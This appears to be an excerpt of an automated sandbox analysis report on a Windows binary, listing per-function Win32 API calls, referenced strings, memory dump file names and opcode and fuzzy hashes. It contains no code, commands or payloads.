GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0014869F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9071975968368d20562fdcfcf7d098b1d4e77346e44ae3291c492d71ead2f1e8
Instruction ID: b05260fba8d51d78d01ef9235663fe1a5bee5002472b844a03fb9061f807b2c9
Opcode Fuzzy Hash: 9071975968368d20562fdcfcf7d098b1d4e77346e44ae3291c492d71ead2f1e8
Instruction Fuzzy Hash: 9DF04F75200204AFEB111FA5EC88E6B7BBDFF8A754F100029F949C6160CB619982DA60

Function 0014C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0014C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0014C6D1
MessageBeep.USER32(00000000), ref: 0014C6E9
KillTimer.USER32(?,0000040A), ref: 0014C705
EndDialog.USER32(?,00000001), ref: 0014C71F

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9d71993528d6a6a9e3a690bc539a5ca847ecdb4083f925a3f5b5e076e6e9f2af
Instruction ID: 703199de0e3eee306fbcd2bb0da65601cce3433973673256047539763046a6f8
Opcode Fuzzy Hash: 9d71993528d6a6a9e3a690bc539a5ca847ecdb4083f925a3f5b5e076e6e9f2af
Instruction Fuzzy Hash: DA014F34501704ABEB655B20DD4EFA677B8BB00746F00066DB546A18F1DBE0A9D58E81

Function 000F13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 000F13BF
StrokeAndFillPath.GDI32(?,?,0012BAD8,00000000,?), ref: 000F13DB
SelectObject.GDI32(?,00000000), ref: 000F13EE
DeleteObject.GDI32 ref: 000F1401
StrokePath.GDI32(?), ref: 000F141C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1d4087a3d9bd8e68d1d7efa8c09f484990dbf884c69c45bf2ca9c695b7093392
Instruction ID: ed5cbebf412db7957288f661f87a05f71233aa85a5ad76e8037880dbbcfaf99c
Opcode Fuzzy Hash: 1d4087a3d9bd8e68d1d7efa8c09f484990dbf884c69c45bf2ca9c695b7093392
Instruction Fuzzy Hash: 55F0B231004308EBDB225F26EC087A93BB5AB51326F048328F52995DF1C73999E6EF50

Function 00102E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 000F7BB1: _memmove.LIBCMT ref: 000F7C0B

__swprintf.LIBCMT ref: 0010302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00102EC6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: fd9ccfbb0fc038f8b4b8bdbcec493528a9c52d9a96fc730d7a6b66a12eaf11c5
Instruction ID: a1be5409cfe7060e89b3bfe12dea6d6fa1dc2002486fd25b1ec0293b45b477c0
Opcode Fuzzy Hash: fd9ccfbb0fc038f8b4b8bdbcec493528a9c52d9a96fc730d7a6b66a12eaf11c5
Instruction Fuzzy Hash: D3919931508305AFC728EF24D895CBFB7A8EF95740F00492DF5969B2A2DB60EE44DB52

Function 0011524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001152DD

Part of subcall function 00120340: __87except.LIBCMT ref: 0012037B

Strings

pow, xrefs: 001152B5, 001152D2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: c76f2b48bda2d954486275df6a27fe43e9ecd2106f8f07981dd315cc177119b3
Instruction ID: 5b737a63fab2b99cfbd536712c1f4d475d437b8836e41f5927d9798c96c87b0c
Opcode Fuzzy Hash: c76f2b48bda2d954486275df6a27fe43e9ecd2106f8f07981dd315cc177119b3
Instruction Fuzzy Hash: E1516C22A1C601C7CB1AB714E9413BE6B91AB84750F308A78E4D5836E7EF74CCE49B46

Function 0011023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00110277
#, xrefs: 00110280

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 9297f4a8b89aa09cc35fa8322faefa282eb44504b3effd0f7a747905cf390fa1
Instruction ID: b32c6e3dae672cf9cffff80ebe3de24b315b79c5dba835faed1f426a3e076757
Opcode Fuzzy Hash: 9297f4a8b89aa09cc35fa8322faefa282eb44504b3effd0f7a747905cf390fa1
Instruction Fuzzy Hash: 055125359046499FCF1A9FA8C888AFA7BA5FF1A310F144065F8919B2A2D7709C82C761

Function 001062F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001063A8
_memmove.LIBCMT ref: 00106446
_memset.LIBCMT ref: 0010646A

Strings

ERCP, xrefs: 00106313

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 9ba64f46e70ba2d3039211ddc0425d3106c9edf5f059f1cff1e5c16e882eefe1
Instruction ID: 9227b66b0c448a6a345bbc3398eca15b36f624e94911f29c3e9b1a0ae6ab7e2e
Opcode Fuzzy Hash: 9ba64f46e70ba2d3039211ddc0425d3106c9edf5f059f1cff1e5c16e882eefe1
Instruction Fuzzy Hash: 1A51B2719007099FDB28CF65C8817AABBF4FF04714F20856EE98ADB691E7B19694CB40

Function 00177648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001776D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001776E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00177708

Strings

SysMonthCal32, xrefs: 0017769B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 710b24c394995fac7c57bda0a0da404f81eb606b1117c36200be7fab1e413777
Instruction ID: d7db07996f81a754b509b081297111e6a028d7a63bbb65085a31404e36184ef6
Opcode Fuzzy Hash: 710b24c394995fac7c57bda0a0da404f81eb606b1117c36200be7fab1e413777
Instruction Fuzzy Hash: 3A21D132504218BBDF15CFA4CC86FEA3B79EF48714F114254FE196B1D0DBB1A8918BA0

Function 00176F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00176FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00176FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00176FDF

Strings

Listbox, xrefs: 00176F77

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 588100512cb2acbeb3eac64b8381d365f230f5ab1a39f1c881fc613a80cc2c65
Instruction ID: ce2a7e556ff9aecaa30774a8f95a336dc31bc1c4930f33453cd5426ea3959df2
Opcode Fuzzy Hash: 588100512cb2acbeb3eac64b8381d365f230f5ab1a39f1c881fc613a80cc2c65
Instruction Fuzzy Hash: 16219232610118BFDF159F54DC95FBB3BBAEF89754F118124FA189B190CB71AC518BA0

Function 0014912D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0014914F
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00149166
SendMessageW.USER32(?,0000000D,?,00000000), ref: 0014919E

Strings

@U=u, xrefs: 0014919E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 118846527986a83baf3b7c0a084960577ad04fcc848722d0e8216c8f5dd80ddb
Instruction ID: c1432dc04726858c2f93bc1c0871c2ab1b04de2ac7479e2a8c041c1bca8d72f1
Opcode Fuzzy Hash: 118846527986a83baf3b7c0a084960577ad04fcc848722d0e8216c8f5dd80ddb
Instruction Fuzzy Hash: 85219272A00109BBDF24EBA8D8469AFB7BDAF44760F11055AF505E32A0DB71BD419B90

Function 001660EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000402,00000000,00000000), ref: 0016613B
SendMessageW.USER32(0000000C,00000000,?), ref: 0016617C
SendMessageW.USER32(0000000C,00000000,?), ref: 001661A4

Strings

@U=u, xrefs: 0016613B, 0016617C, 001661A4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 53469714b0e46ea471d70244396c841fd5071a78b02e1be2a68ec10972bf007c
Instruction ID: b533c148af57c9a51a783eaac23c97dcb72420c35588dae5519aaf22613db3bd
Opcode Fuzzy Hash: 53469714b0e46ea471d70244396c841fd5071a78b02e1be2a68ec10972bf007c
Instruction Fuzzy Hash: D4215E75300501AFEB10EB14DD85E6AB7F5FF89310B018158FA099BA72CB30BCA1DB90

Function 0017797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001779E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001779F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00177A03

Strings

msctls_trackbar32, xrefs: 001779B8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a143c0e03fc8d7594d0897d4e48fa195647fb01f08f15ebdacdae9b2eda4c18a
Instruction ID: cc4a714a08c792e4acac125ef03dddbc995852bdbc599f05746b9daf1bbfbb04
Opcode Fuzzy Hash: a143c0e03fc8d7594d0897d4e48fa195647fb01f08f15ebdacdae9b2eda4c18a
Instruction Fuzzy Hash: 5D112372244208BAEF109F60CC05FEB3BB9EF89B64F024528FB04A20D0D3719851CB20

Function 001492E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00149355

Strings

ListBox, xrefs: 0014931F
@U=u, xrefs: 00149355
ComboBox, xrefs: 001492F4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: cf9183e4e22f713b1a61ff03654aab4d94a48077228043eff9a53435aa8d10fb
Instruction ID: c6956f22654bea09d3fad84014c8f1d87bfb6c7b8fc977321ba8d4db00479f92
Opcode Fuzzy Hash: cf9183e4e22f713b1a61ff03654aab4d94a48077228043eff9a53435aa8d10fb
Instruction Fuzzy Hash: 5401F171A45218ABCB08EFB4CC928FF7379BF06320B140619FA32572E2DB31580C9651

Function 001491DF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0014924D

Strings

ListBox, xrefs: 00149217
@U=u, xrefs: 0014924D
ComboBox, xrefs: 001491EC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 00264900a989d2b18901aa438fbc2a151af9382a83fd6a00bc957427c0f0e673
Instruction ID: 09aa17eea18b3e1a71ae3af869a681fcd29cd2d9eb57026241f143ab5a1dd0ba
Opcode Fuzzy Hash: 00264900a989d2b18901aa438fbc2a151af9382a83fd6a00bc957427c0f0e673
Instruction Fuzzy Hash: 9E01A775E452087BCB08EBA4C992DFF73BC9F55300F140029BA1667692EB515F1C96B2

Function 00149264 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 001492D0

Strings

ListBox, xrefs: 0014929C
@U=u, xrefs: 001492D0
ComboBox, xrefs: 00149271

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: aa4037f752585ab8aae9b8b6e1a49785dfc233594f1d1f482f9ab39d53734365
Instruction ID: 5415ce20982ce2cca84e9e1e57fe964e1d6cb6d2a93ed38aeb25aa21372e44e0
Opcode Fuzzy Hash: aa4037f752585ab8aae9b8b6e1a49785dfc233594f1d1f482f9ab39d53734365
Instruction Fuzzy Hash: 3501D6B1E8520877CB08EBA4C982EFF77BC9F11301F240125BA1663692DB619F0C9272

Function 0017AF89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,001B67B0,0017DB17,000000FC,?,00000000,00000000,?,?,?,0012BBB9,?,?,?,?,?), ref: 0017AF8B
GetFocus.USER32 ref: 0017AF93

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC

SendMessageW.USER32(00A6E550,000000B0,000001BC,000001C0), ref: 0017B005

Strings

@U=u, xrefs: 0017B005

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: 1319556ee2147c66eca5c0cbc76245d270c0b188b4075a558b6e13a24f0f9da0
Instruction ID: 9e26b0b0581ae30f7593ae3d65616c3c40cc9893329483629547bafa8a8a8497
Opcode Fuzzy Hash: 1319556ee2147c66eca5c0cbc76245d270c0b188b4075a558b6e13a24f0f9da0
Instruction Fuzzy Hash: 44015E312046009FC7249B28D8D4BA777F6FF8A324F18426DF52A876A1CB31AC87CB50

Function 001061C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0010619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001061B1

SendMessageW.USER32(?,0000000C,00000000,?), ref: 001061DF
GetParent.USER32(?), ref: 0014111F
InvalidateRect.USER32(00000000,?,00103BAF,?,00000000,00000001), ref: 00141126

Strings

@U=u, xrefs: 001061DF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID: @U=u
API String ID: 3648793173-2594219639
Opcode ID: 4f828a52f245a00ee6678273f7d7002f844d0c2b2ce1a88e399327727fd27326
Instruction ID: a0073dba07bd49d25a26368e1e038094511689c1de766afa8d569ff557205bc1
Opcode Fuzzy Hash: 4f828a52f245a00ee6678273f7d7002f844d0c2b2ce1a88e399327727fd27326
Instruction Fuzzy Hash: 6FF03035140204FBEF202F60DC09F967BA9AF65754F204439F5859A4F2C7F658A1AB50

Function 000F4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000F4C2E), ref: 000F4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000F4CB5

Strings

kernel32.dll, xrefs: 000F4C9E
GetNativeSystemInfo, xrefs: 000F4CAF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 6ce1da97879a109b180214d27c53e972ad645df1d0fc13369931c7f9d195175c
